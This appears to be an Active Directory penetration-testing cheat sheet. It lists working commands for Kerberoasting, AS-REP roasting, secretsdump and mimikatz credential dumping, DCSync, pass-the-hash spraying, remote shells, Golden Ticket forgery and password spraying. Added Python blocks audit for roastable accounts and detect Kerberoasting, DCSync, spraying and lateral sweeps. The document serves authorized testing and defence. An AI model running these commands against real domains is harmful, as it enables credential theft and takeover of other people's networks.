
Active Directory Attacks Cheat Sheet

Active Directory attack workflow: enumeration, Kerberoasting, AS-REP roasting, credential dumping, and lateral movement on authorized engagements.

Category: Active Directory & Windows. Tags: active-directory, kerberos, lateral-movement, post-exploitation, windows. Updated 2026-06-17

Overview

Most internal pentests are won in Active Directory. The path is consistent: enumerate the domain (BloodHound), harvest credentials (roasting, dumping), then move laterally and escalate to Domain Admin. This sheet chains the standard tools—impacket, netexec, BloodHound, mimikatz, rubeus—into that workflow.

Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.

Enumeration

Sweep subnet, find domain hosts and SMB signing

nxc smb 10.10.10.0/24

Enumerate domain users with valid creds

nxc smb 10.10.10.10 -u user -p pass --users

Collect BloodHound data remotely

bloodhound-python -d corp.local -u user -p pass -ns 10.10.10.10 -c all

Find delegation misconfigurations

nxc ldap 10.10.10.10 -u user -p pass --trusted-for-delegation

Roasting (offline cracking)

Kerberoast — request TGS hashes for SPN accounts

impacket-GetUserSPNs corp.local/user:pass -dc-ip 10.10.10.10 -request

AS-REP roast — accounts with no pre-auth required

impacket-GetNPUsers corp.local/ -usersfile users.txt -dc-ip 10.10.10.10 -no-pass

Crack Kerberoast (TGS-REP) hashes

hashcat -m 13100 kerb.hash rockyou.txt

Crack AS-REP hashes

hashcat -m 18200 asrep.hash rockyou.txt
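The three directory conditions that GetUserSPNs, GetNPUsers and the netexec delegation check above rely on are all readable from ordinary user attributes, so a defender can audit them before anyone roasts them. The following is an added example, not code from the cheat sheet: it walks a constructed export of user objects (sAMAccountName, userAccountControl, servicePrincipalName, adminCount are real attribute names; the records and their values are made up) and reports enabled accounts that are Kerberoastable, AS-REP roastable (UF_DONT_REQUIRE_PREAUTH) or trusted for unconstrained delegation (UF_TRUSTED_FOR_DELEGATION).

```python
"""Audit constructed AD user records for the exposures this sheet enumerates.

Added example, not part of the cheat sheet. Input records are constructed,
not real directory data; in practice feed it the output of an LDAP export.
"""

# userAccountControl bit flags (documented values; only the three used here)
UF_ACCOUNTDISABLE = 0x0002
UF_TRUSTED_FOR_DELEGATION = 0x80000    # unconstrained delegation
UF_DONT_REQUIRE_PREAUTH = 0x400000     # AS-REP roastable
UF_NORMAL_DONT_EXPIRE = 0x10200        # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD (typical service account)

# Constructed sample export shaped like a handful of user objects.
SAMPLE_USERS = [
    {"sAMAccountName": "svc_sql", "userAccountControl": UF_NORMAL_DONT_EXPIRE,
     "servicePrincipalName": ["MSSQLSvc/sql01.corp.local:1433"], "adminCount": 1},
    {"sAMAccountName": "jdoe", "userAccountControl": UF_NORMAL_DONT_EXPIRE,
     "servicePrincipalName": [], "adminCount": 0},
    {"sAMAccountName": "legacyapp",
     "userAccountControl": UF_NORMAL_DONT_EXPIRE | UF_DONT_REQUIRE_PREAUTH,
     "servicePrincipalName": [], "adminCount": 0},
    {"sAMAccountName": "oldsvc",   # disabled: cannot be roasted, must not be reported
     "userAccountControl": UF_NORMAL_DONT_EXPIRE | UF_ACCOUNTDISABLE | UF_DONT_REQUIRE_PREAUTH,
     "servicePrincipalName": ["HTTP/old.corp.local"], "adminCount": 0},
    {"sAMAccountName": "backup_svc",
     "userAccountControl": UF_NORMAL_DONT_EXPIRE | UF_TRUSTED_FOR_DELEGATION,
     "servicePrincipalName": ["backup/bk01.corp.local"], "adminCount": 0},
    {"sAMAccountName": "krbtgt",   # disabled by default in every domain
     "userAccountControl": UF_NORMAL_DONT_EXPIRE | UF_ACCOUNTDISABLE,
     "servicePrincipalName": ["kadmin/changepw"], "adminCount": 1},
]


def audit_users(users):
    """Return {finding: [sAMAccountName, ...]} over enabled accounts only.

    Disabled accounts cannot obtain tickets, so they are skipped. krbtgt is
    excluded from the Kerberoast list: its SPN is expected and its key is only
    exposed through replication (see the DCSync section).
    """
    findings = {"kerberoastable": [], "kerberoastable_privileged": [],
                "asrep_roastable": [], "unconstrained_delegation": []}
    for u in users:
        uac = u["userAccountControl"]
        name = u["sAMAccountName"]
        if uac & UF_ACCOUNTDISABLE:
            continue
        if u["servicePrincipalName"] and name.lower() != "krbtgt":
            findings["kerberoastable"].append(name)
            if u.get("adminCount") == 1:          # SPN on a protected account: fix first
                findings["kerberoastable_privileged"].append(name)
        if uac & UF_DONT_REQUIRE_PREAUTH:
            findings["asrep_roastable"].append(name)
        if uac & UF_TRUSTED_FOR_DELEGATION:
            findings["unconstrained_delegation"].append(name)
    return findings


if __name__ == "__main__":
    for finding, names in audit_users(SAMPLE_USERS).items():
        print(f"{finding:26s} {', '.join(names) or '-'}")
```

The ordering of the fixes follows the findings: SPNs on accounts with adminCount=1 and unconstrained delegation first (rotate to a long random password or a gMSA, remove the delegation bit), then clear UF_DONT_REQUIRE_PREAUTH on anything that still has it.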

Credential dumping

Dump SAM/LSA/NTDS secrets remotely

impacket-secretsdump corp.local/user:pass@10.10.10.10

Dump local SAM hashes

nxc smb 10.10.10.10 -u admin -p pass --sam

mimikatz: DCSync the krbtgt hash (needs replication rights)

lsadump::dcsync /domain:corp.local /user:krbtgt

mimikatz: dump credentials from LSASS memory

sekurlsa::logonpasswords
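Two of the techniques on this sheet leave a distinctive trace on the domain controller: a Kerberoast run requests RC4 (etype 0x17) service tickets for several user SPNs in a burst (event 4769), and a DCSync exercises the two replication control-access rights (event 4662) from a principal that is not a domain controller. The block below is an added example, not from the cheat sheet: two detection rules over constructed event records that use the Security-log field names for 4769 and 4662. The replication GUIDs are the documented DS-Replication-Get-Changes and DS-Replication-Get-Changes-All rights; the threshold of three distinct services and the allowlist of DC accounts are assumptions to tune per environment.

```python
"""Detection logic for Kerberoasting (event 4769) and DCSync (event 4662).

Added example, not from the cheat sheet. Events are constructed records using
Windows Security log field names, not captured data.
"""
from collections import defaultdict

# Control-access rights that together allow a principal to pull secrets via replication.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_GUIDS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}

RC4_HMAC = 0x17  # TicketEncryptionType roasting tools ask for (cheap to crack offline)


def _tgs(user, service, etype, ip):
    return {"EventID": 4769, "TargetUserName": user, "ServiceName": service,
            "TicketEncryptionType": etype, "IpAddress": ip}


def _acl(subject, *guids):
    # 4662 writes each property GUID wrapped in braces, e.g. {1131f6aa-...}
    return {"EventID": 4662, "SubjectUserName": subject,
            "Properties": ["{%s}" % g for g in guids]}


SAMPLE_EVENTS = [
    _tgs("jdoe@CORP.LOCAL", "WS01$", 0x12, "10.10.10.55"),           # normal AES ticket
    _tgs("jdoe@CORP.LOCAL", "svc_sql", RC4_HMAC, "10.10.10.55"),     # three RC4 tickets for
    _tgs("jdoe@CORP.LOCAL", "backup_svc", RC4_HMAC, "10.10.10.55"),  # three user SPNs in a row:
    _tgs("jdoe@CORP.LOCAL", "svc_web", RC4_HMAC, "10.10.10.55"),     # the GetUserSPNs pattern
    _tgs("asmith@CORP.LOCAL", "svc_sql", RC4_HMAC, "10.10.10.60"),   # single legacy client, likely benign
    _acl("DC01$", DS_REPLICATION_GET_CHANGES_ALL),                   # DC-to-DC replication: expected
    _acl("jdoe", DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL),  # user pulling secrets
]


def kerberoast_suspects(events, min_distinct_services=3):
    """Requesters that obtained RC4 service tickets for >= N distinct user SPNs.

    Machine accounts ($) are skipped because their keys are random and AES is
    the norm for them; krbtgt is the TGT service itself, not a roast target.
    """
    per_requester = defaultdict(set)
    for e in events:
        if e.get("EventID") != 4769 or e.get("TicketEncryptionType") != RC4_HMAC:
            continue
        svc = e["ServiceName"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        per_requester[e["TargetUserName"]].add(svc)
    return {u: sorted(s) for u, s in per_requester.items()
            if len(s) >= min_distinct_services}


def dcsync_suspects(events, replication_allowlist=("DC01$",)):
    """Subjects of 4662 events that used a replication right without being on
    the allowlist of accounts expected to replicate (DCs, Entra Connect, etc.)."""
    hits = []
    for e in events:
        if e.get("EventID") != 4662:
            continue
        props = {p.strip("{}").lower() for p in e.get("Properties", [])}
        if props & REPLICATION_GUIDS and e["SubjectUserName"] not in replication_allowlist:
            hits.append(e["SubjectUserName"])
    return hits


if __name__ == "__main__":
    print("kerberoast:", kerberoast_suspects(SAMPLE_EVENTS))
    print("dcsync:", dcsync_suspects(SAMPLE_EVENTS))
```

Auditing 4662 requires the "Directory Service Access" subcategory to be enabled and a SACL on the domain head; without that the DCSync rule has no events to read. A Kerberoast rule keyed on etype 0x17 only works while RC4 remains enabled; the better fix is to move SPN accounts to AES-only keys, after which any RC4 request is itself the alert.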

Pass-the-hash / lateral movement

Spray a hash across the subnet (PtH)

nxc smb 10.10.10.0/24 -u admin -H <NTLM> --local-auth

SYSTEM shell via PsExec with a hash

impacket-psexec corp.local/admin@10.10.10.20 -hashes :<NTLM>

WinRM shell using a hash

evil-winrm -i 10.10.10.20 -u admin -H <NTLM>

Quieter WMI-based execution

impacket-wmiexec corp.local/admin@10.10.10.20 -hashes :<NTLM>

Kerberos ticket attacks

Forge a Golden Ticket (full domain persistence)

impacket-ticketer -nthash <krbtgt-hash> -domain-sid <SID> -domain corp.local Administrator

Request and inject a TGT (overpass-the-hash)

Rubeus.exe asktgt /user:admin /rc4:<NTLM> /ptt

Pass-the-ticket with a ccache

export KRB5CCNAME=ticket.ccache; impacket-psexec -k -no-pass corp.local/admin@dc.corp.local

Quick one-liners

Find machines where you can run code

nxc smb targets.txt -u admin -p pass -x whoami

Check for SMB signing (relay candidates)

nxc smb 10.10.10.0/24 --gen-relay-list relay.txt

Password spray one password across all users

nxc smb 10.10.10.10 -u users.txt -p 'Spring2026!' --continue-on-success

Read GPP passwords from SYSVOL

nxc smb 10.10.10.10 -u user -p pass -M gpp_password
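The hash spray and the password spray above share one shape in the logs: a single source touching many distinct targets in a few minutes, where a normal user touches one. The following added example, not from the cheat sheet, implements that fan-out check once and applies it twice over constructed Security-log records: many failed logons (4625, or 4771 for Kerberos pre-auth failures) against different usernames from one IpAddress, and network logons (4624, LogonType 3) by one account onto many different hosts. Field names are the real event fields; the window, the thresholds and the sample events are assumptions.

```python
"""Fan-out detection: password spraying (one source, many accounts) and hash
spraying / lateral sweeps (one account, many hosts).

Added example, not from the cheat sheet. Events are constructed in the shape
of Windows Security log fields; Computer is the host that wrote the event.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta


def fan_out_alerts(events, key_field, distinct_field, matches, threshold,
                   window=timedelta(minutes=5)):
    """Alert when one value of key_field touches >= threshold distinct values of
    distinct_field inside a sliding time window; `matches` selects the events."""
    recent = defaultdict(deque)   # key -> deque of (time, distinct value)
    alerts = {}
    for e in sorted(events, key=lambda ev: ev["time"]):
        if not matches(e):
            continue
        key, t = e[key_field], datetime.fromisoformat(e["time"])
        q = recent[key]
        q.append((t, e[distinct_field]))
        while q and t - q[0][0] > window:
            q.popleft()            # drop entries that fell out of the window
        seen = {v for _, v in q}
        if len(seen) >= threshold:
            alerts[key] = sorted(seen)
    return alerts


def password_spray_alerts(events, threshold=10):
    """Failed logons from one source IP against many different usernames."""
    return fan_out_alerts(events, "IpAddress", "TargetUserName",
                          lambda e: e["EventID"] in (4625, 4771), threshold)


def lateral_sweep_alerts(events, threshold=5):
    """Network logons by one account onto many distinct hosts in minutes."""
    return fan_out_alerts(events, "TargetUserName", "Computer",
                          lambda e: e["EventID"] == 4624 and e["LogonType"] == 3,
                          threshold)


def _ev(event_id, t, ip, user, computer, logon_type=3):
    return {"EventID": event_id, "time": t.isoformat(), "IpAddress": ip,
            "TargetUserName": user, "Computer": computer, "LogonType": logon_type}


BASE = datetime(2026, 6, 17, 9, 0, 0)
SAMPLE_EVENTS = (
    # one source, twelve different users, ten seconds apart: spray pattern
    [_ev(4625, BASE + timedelta(seconds=10 * i), "10.10.10.99", f"user{i:02d}", "DC01")
     for i in range(12)]
    # one user mistyping their own password three times: benign
    + [_ev(4625, BASE + timedelta(seconds=30 * i), "10.10.10.42", "jdoe", "DC01")
       for i in range(3)]
    # one admin account landing on six hosts within ninety seconds: sweep pattern
    + [_ev(4624, BASE + timedelta(seconds=15 * i), "10.10.10.55", "admin", host)
       for i, host in enumerate(["WS01", "WS02", "WS03", "FS01", "SQL01", "WEB01"])]
    # an interactive logon by a normal user: not a network logon, not counted
    + [_ev(4624, BASE + timedelta(minutes=2), "10.10.10.42", "jdoe", "WS07", logon_type=2)]
)


if __name__ == "__main__":
    print("spray:", password_spray_alerts(SAMPLE_EVENTS))
    print("sweep:", lateral_sweep_alerts(SAMPLE_EVENTS))
```

The spray rule deliberately counts distinct usernames rather than raw failures, which is what separates it from a user locked out by a stale saved password; pair it with a lockout policy that tolerates a few attempts per window so the sheet's "one attempt per account" spray still trips the distinct-user threshold without locking anyone out. The sweep rule needs 4624 forwarded from member servers and workstations, not only from the DCs.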

Tips

  • Run BloodHound early — it maps the shortest path to Domain Admin so you don't attack blind.
  • Kerberoasting only needs any valid domain account; it's the highest-ROI first move.
  • Watch lockout policy before password spraying — one attempt per account per window.
  • Golden/Silver tickets are persistence; only use them with explicit authorization and clean up after.
